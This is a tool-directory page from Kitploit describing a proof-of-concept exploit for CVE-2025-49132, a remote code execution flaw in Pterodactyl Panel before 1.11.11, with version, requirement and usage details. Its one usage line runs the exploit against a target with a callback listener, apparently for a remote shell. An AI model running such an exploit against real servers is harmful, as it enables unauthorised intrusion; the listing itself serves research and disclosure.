Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-49132-PoC — This script exploits Remote Code Execution vulnerability in Pterodactyl Panel < 1.11.11 | Kitploit
Tools/GitHubGitHub/pwndalf/cve-2025-49132-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubpwndalf/cve-2025-49132-poc

CVE-2025-49132-PoC

This script exploits Remote Code Execution vulnerability in Pterodactyl Panel < 1.11.11

View Repository
16 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-49132 PoC by Pwndalf

Overview

This repository contains a Proof of Concept (PoC) for CVE-2025-49132, a Remote Code Execution (RCE) vulnerability affecting Pterodactyl Panel < 1.11.11 This PoC was developed and tested in a controlled lab environment for research and educational purposes.


Affected Versions

  • Pterodactyl Panel versions prior to 1.11.11

Fixed Version

  • Pterodactyl Panel 1.11.11 and later

Technical Summary

The vulnerability originates from insufficient validation of user-controlled input in a request handler, which allows unintended backend interaction. Under certain conditions, this can lead to remote command execution.


Requirements

  • Python 3.8+
  • A TCP listener

Usage

root@kitploit:~
python3 exploit.py -t <target> -l <listener_ip> -p <listener_port>
Download Tool